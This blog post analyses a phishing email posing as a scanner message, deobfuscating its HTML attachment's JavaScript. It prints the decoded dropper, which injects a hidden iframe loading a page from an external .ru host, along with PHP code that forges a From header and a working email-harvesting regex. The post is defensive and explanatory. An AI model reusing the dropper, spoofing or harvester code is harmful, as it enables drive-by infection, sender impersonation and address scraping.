Spamming/Phishing analysis

Posted on March 15, 2012

I just got an email today, flagged as spam in my mailbox. As I didn’t have much to do today, I decided to have a look at it and check what the spammer’s goal was. First, let’s have a glance at what spamming and phishing are.

Spam is the use of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately.

Wikipedia

Everyone on the Internet has already seen spam: those ads that propose a new way to lose fat, or congratulate you because you are the Xth visitor and have won an iPad. Even though the volume of spam is decreasing, the number of spam messages per day is still quite high: about 50 billion in January 2011 (I know it’s old news, but you get the idea).

Spam messages may be just unsolicited advertising sent for marketing purposes, but sometimes (often?) the spammer uses the technique for illegal purposes such as stealing information (e.g. credit card numbers) or installing malware on the victim’s computer. To do so, the spammer combines it with another attack: phishing.

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

Wikipedia

The most widely recognized form of spam is e-mail spam, and that’s how I got the phishing file (an HTML document). Spammers use automated scripts that crawl the Internet to collect as many email addresses as possible. At their simplest they use a regular expression looking for a string of the form something@something.something; real harvesters use more elaborate expressions to catch as many addresses as possible, including lightly obfuscated spellings. Spammers also use hoaxes and forwarded email chains to collect even more addresses.
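As an added example (not from the original post), here is what such a harvester looks like in JavaScript, run over a constructed HTML snippet: the naive “something@something.something” pattern catches plain addresses, an extended pattern also catches the “[at]” / “[dot]” spelling, and neither gets anything from an address rendered as an image or from a contact form. The sample page and both patterns are this example’s own.

```javascript
// Added example: a minimal email harvester of the kind spammers run over
// crawled pages. The HTML below is constructed for this demo.
const SAMPLE_HTML = `
<p>Contact: <a href="mailto:alice@example.org">alice@example.org</a></p>
<p>Support: bob.smith+tickets@mail.example.com</p>
<p>Obfuscated: carol [at] example [dot] net</p>
<p>Image only: <img src="/img/dave-email.png" alt="contact"></p>
<form action="/contact" method="post"><input name="message"></form>
`;

// The "something@something.something" pattern from the text.
const NAIVE = /[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/g;

// A slightly more elaborate pattern: "@" may be written "[at]" or "(at)",
// "." may be written "[dot]" or "(dot)", with optional spaces around them.
const SEP_AT = String.raw`\s*(?:@|\[at\]|\(at\))\s*`;
const SEP_DOT = String.raw`\s*(?:\.|\[dot\]|\(dot\))\s*`;
const EXTENDED = new RegExp(
  String.raw`([A-Za-z0-9._%+-]+)` + SEP_AT +
  String.raw`([A-Za-z0-9-]+(?:` + SEP_DOT + String.raw`[A-Za-z0-9-]+)+)`,
  'gi'
);

// Returns the unique plain addresses, in order of first appearance.
function harvestNaive(html) {
  return [...new Set(html.match(NAIVE) || [])];
}

// Same, but normalises the obfuscated spellings back to user@domain.tld.
function harvestExtended(html) {
  const found = new Set();
  for (const m of html.matchAll(EXTENDED)) {
    const domain = m[2].replace(new RegExp(SEP_DOT, 'gi'), '.');
    found.add(`${m[1]}@${domain}`);
  }
  return [...found];
}

console.log('naive   :', harvestNaive(SAMPLE_HTML));
console.log('extended:', harvestExtended(SAMPLE_HTML));
```

The address in the image and the contact form are the only two that survive both passes, which is the whole argument for the countermeasures at the end of the post.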

Analysis

Here is what I received: an email from “scanner@my-personal-domain.be” with the subject “Re: Scan from a Hewlett-Packard ScanJet 112864“, and the following content:

Attached document was scanned and sent

to you using a Hewlett-Packard ScanJet 265600K.
SENT BY: GRACE
PAGES : 5
FILETYPE: .HTML [Internet Explorer File]

This was kind of clever, using an @my-personal-domain.be address (actually something else, but I don’t want to tell you my personal domain and email address). If I were working in a company, getting an email from the user “scanner” would have been really confusing, and if the spammer had used a better way to send the mail and deceived the mail service so as to avoid the spam flag, this attack would have been really effective.

Anyone can easily send an email with an arbitrary sender address (e.g. obama@whitehouse.gov): the From: header is just text supplied by the sender, and SMTP itself does not verify it. Only checks on the receiving side (SPF on the envelope sender, DKIM signatures and DMARC alignment of the From: domain) can tell a forged sender apart from a legitimate one. For instance in PHP, you can use the following code:

<?php
$to      = "recipient@example.com";
$subject = "Hi!";
$body    = "Hi,\n\nHow are you?";
// The From: header is arbitrary text; nothing here proves who really sent the mail.
$headers = "From: obama@whitehouse.gov\r\n" .
           "X-Mailer: php";
if (mail($to, $subject, $body, $headers)) {
    echo("<p>Message sent!</p>");
} else {
    echo("<p>Message delivery failed…</p>");
}
?>

The mail embedded an HTML file named “HP_Scan-14-810409.htm“. I downloaded it and checked the code. It is an HTML page with the title “Page 5“, the text “Page is loading… ” and a piece of JavaScript. The code uses two obfuscation techniques to make it harder to read: first, the whole script is condensed onto a single line; second, it contains many statements that are not needed but make it longer to follow. Let’s break the code into several pieces:

if(window.document)
    aa=0+[];

The if statement is always true when the page is opened in a browser, since window.document exists. The assignment “aa=0+[]” is subtler than it looks: adding a number to an empty array coerces the array to the empty string, so aa holds the string “0”, not the number 0.

aaa='10'.substr(1);

It assigns to aaa the value of “10” starting from its second character, i.e. the string “0” again. Both variables therefore hold the same string, which is what makes the strict comparison below succeed.

try{
  new "a".prototype;
} catch (hgberger) {
  [...]
}

“a”.prototype is undefined, and calling new on undefined throws a TypeError, so the catch block (its parameter name “hgberger” is meaningless) is always executed. In a browser you can ignore the try/catch entirely; its only plausible purpose is to confuse tools or readers that do not expect the real code to live inside an error handler.

if(aa===aaa)
  f=['-29s-29s67s64s-6s2s...'].split('s');

We know that aa and aaa both hold the string “0”, so the if statement is always true. Then f is assigned the string ‘-29s-29s67s64s-6s2s…‘ split on the ‘s‘ character, i.e. an array of numeric strings: f = [“-29”, “-29”, “67”, “64”, “-6”, “2”, …]. Each value is the character code of the hidden script minus 38, as the loop below shows. (As transcribed, the string literal sits inside square brackets; an array has no split method, so the kit’s actual code must call split on the string itself.)

md='a';
e=window["e"+"val"];
w=f;
s=[];
r=String;

It assigns the character “a” to “md“, which is never used afterwards.

The value of “f” is copied into “w“.

“s” is initialised to an empty array; the loop below turns it into a string by concatenation, since [] + “x” yields the string “x”.

“r” is an alias for the String constructor, so r.fromCharCode is simply String.fromCharCode.

The line “e=window[“e”+”val”];” is the trickiest one: it looks up the property named “e” + “val”, i.e. “eval”, on the window object and stores it in “e“. eval() executes the string it is given as code, and splitting its name in two keeps the word “eval” out of the file, so a simple search for it finds nothing.

for(i=0;611!=i;i+=1)
{
  j=i;
  s=s+r.fromCharCode(38+1*w[j]);
}

fromCharCode() converts character codes to characters. The loop goes over all 611 elements of w (= f), adds 38 to each (the “1*” coerces the string to a number) and appends the resulting character to s:

-29 + 38 = 9 = TAB

-29 + 38 = 9 = TAB

67 + 38 = 105 = i

64 + 38 = 102 = f

-6 + 38 = 32 = SPACE

2 + 38 = 40 = (

etc
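The loop above is the whole decoder. As an added example (not code from the original page or from the spam kit), here is the same scheme re-implemented in plain JavaScript without ever calling eval(): the encoder exists only to build a constructed sample whose first six values match the page’s “-29s-29s67s64s-6s2s”, the decoder mirrors the loop, and a small hook shows how to capture what the script hands to its eval alias instead of executing it. The sample text and the object standing in for window are assumptions of this demo.

```javascript
// Added example: static decoding of the "-29s-29s67s..." payload scheme and
// an eval-capture hook for analysis. Not part of the original page.
const OFFSET = 38; // the constant added to every element before fromCharCode

// Inverse of the dropper's loop; used here only to build test input.
function encodePayload(plain) {
  return Array.from(plain, ch => String(ch.charCodeAt(0) - OFFSET)).join('s');
}

// Mirrors the obfuscated loop:
//   w = '...'.split('s');  s = s + r.fromCharCode(38 + 1*w[j]);
// but iterates over the real array length instead of a hard-coded 611 and
// returns the text instead of passing it to eval().
function decodePayload(encoded) {
  const w = encoded.split('s');
  let s = '';
  for (let j = 0; j < w.length; j++) {
    s += String.fromCharCode(OFFSET + 1 * w[j]); // 1*"-29" coerces to -29
  }
  return s;
}

// Re-creation of the dropper's control flow, with `win` standing in for the
// browser's window object so the eval alias can be intercepted.
function runDropperLike(win, encoded) {
  const aa = 0 + [];            // "0": an empty array coerces to "", not 0
  const aaa = '10'.substr(1);   // "0" as well, so the strict comparison holds
  const e = win['e' + 'val'];   // window.eval, spelled so "eval" never appears
  if (aa === aaa) {
    const s = decodePayload(encoded);
    if (Math.round((-1 * 2 * 2) * Math.tan(Math.atan(1 / 2))) === -3 + 1) {
      e(s);                     // always reached: round(-4 * 0.5) === -2
    }
  }
}

// Analysis hook: run the dropper against a fake window whose eval records its
// argument instead of executing it, and return everything it tried to run.
function captureEval(runner) {
  const captured = [];
  runner({ eval: code => { captured.push(code); } });
  return captured;
}

// Constructed sample: starts like the real payload ("\t\tif (") but the rest
// is harmless text made up for this demo.
const SAMPLE_PLAIN = "\t\tif (1) { document.title = 'decoded'; }";
const SAMPLE_ENCODED = encodePayload(SAMPLE_PLAIN);

console.log(SAMPLE_ENCODED);
console.log(JSON.stringify(captureEval(w => runDropperLike(w, SAMPLE_ENCODED))));
```

Replacing eval with a recorder is the usual first move when a sample wraps its real code this way: you get the second-stage script as text and decide what to do with it, rather than letting the browser decide for you.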

if (Math.round( (-1*2*2) * Math.tan(Math.atan(1/2)) ) == -3+1)
  e(s);
}

It rounds the value -4 * tan(atan(0.5)). The tangent of the arctangent gives back the initial value, so this is round(-4 * 0.5) = -2, and since -2 equals -3+1 the if statement is always true and e(s) is executed, e being eval() and s the decoded value of w (f). The closing brace ends the catch block opened earlier. But what exactly is the decoded value of w? Here is the value:

if (document.getElementsByTagName('body')[0]){
  iframer();
} else {
  document.write("http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php");
}

function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src','http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

This code creates a hidden iframe that loads the page http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php: the frame is 10 by 10 pixels, absolutely positioned in the top-left corner and invisible, so the victim sees only “Page is loading…” while the browser fetches the remote page. If no <body> element exists yet, the fallback branch merely writes the URL as plain text, which is harmless on its own. I didn’t understand what exactly this PHP page does, but since it is a hidden iframe with a PHP page hosted on a Russian domain, I guess aublbzdni.php has an unethical purpose.
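Once a dropper has been decoded, the next step is to pull out what it does and where it points. As an added example (not part of the original post), here are two small JavaScript helpers run over the decoded script above: one extracts the URLs and parses host, port and path with the standard URL class, the other flags the hidden-iframe pattern. The heuristics and the 10-pixel threshold are this example’s own.

```javascript
// Added example: triage of a decoded dropper. Input is the decoded script as
// reproduced in the post; the heuristics below are this example's own.
const DECODED_DROPPER = `
if (document.getElementsByTagName('body')[0]){
  iframer();
} else {
  document.write("http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php");
}

function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src','http://dsakhfgkallsjfd.ru:8080/images/aublbzdni.php');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');
  document.getElementsByTagName('body')[0].appendChild(f);
}
`;

// Unique http(s) URLs in the script, each broken into the parts you would
// feed to a blocklist or a proxy-log search.
function extractUrls(js) {
  const raw = [...new Set(js.match(/https?:\/\/[^\s'"<>)]+/g) || [])];
  return raw.map(u => {
    const p = new URL(u);
    return {
      url: u,
      host: p.hostname,
      port: p.port || (p.protocol === 'https:' ? '443' : '80'),
      path: p.pathname,
    };
  });
}

// Heuristic: an iframe that is created dynamically, made invisible and given
// tiny dimensions is the classic drive-by loader shape.
function describeIframeDropper(js) {
  const sizes = [...js.matchAll(/setAttribute\(\s*['"](?:width|height)['"]\s*,\s*['"]?(\d+)['"]?\s*\)/g)]
    .map(m => Number(m[1]));
  const createsIframe = /createElement\(\s*['"]iframe['"]\s*\)/.test(js);
  const hidden = /visibility\s*=\s*['"]hidden['"]/.test(js) || /display\s*=\s*['"]none['"]/.test(js);
  const tiny = sizes.length > 0 && sizes.every(n => n <= 10);
  const urls = extractUrls(js);
  const externalOddPort = urls.some(u => !['80', '443'].includes(u.port));
  return {
    createsIframe, hidden, tiny, externalOddPort, urls,
    verdict: createsIframe && hidden && tiny ? 'hidden-iframe dropper' : 'inconclusive',
  };
}

console.log(JSON.stringify(describeIframeDropper(DECODED_DROPPER), null, 2));
```

The host, port and path are what you would hand to the proxy or DNS team to look for other victims; the non-standard port 8080 is worth a rule of its own, since ordinary web traffic from a mail client rarely goes there.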

Countermeasure

Here are a few quick countermeasures against this attack. First of all, stop forwarding those hoaxes and silly email chains. If you need to put your email address on the Internet, use an image: even though OCR tools already exist, this greatly reduces the risk that a spammer harvests your address. Better still, use a contact page protected by a captcha: nobody sees your email address, and bots are likely to be stopped if you use a good captcha system.

I would also suggest being very suspicious whenever you receive a mail from someone you don’t know, or a pseudo-automatic message from a service you know. If you have any doubt, the best option is to contact the IT administrator/helpdesk/etc.

Lastly, an add-on such as NoScript disables all JavaScript by default, which means the script described in this post would not have executed. The downside is that many websites need JavaScript to work properly, but you can allow it on the particular domains you trust.

Posted in: News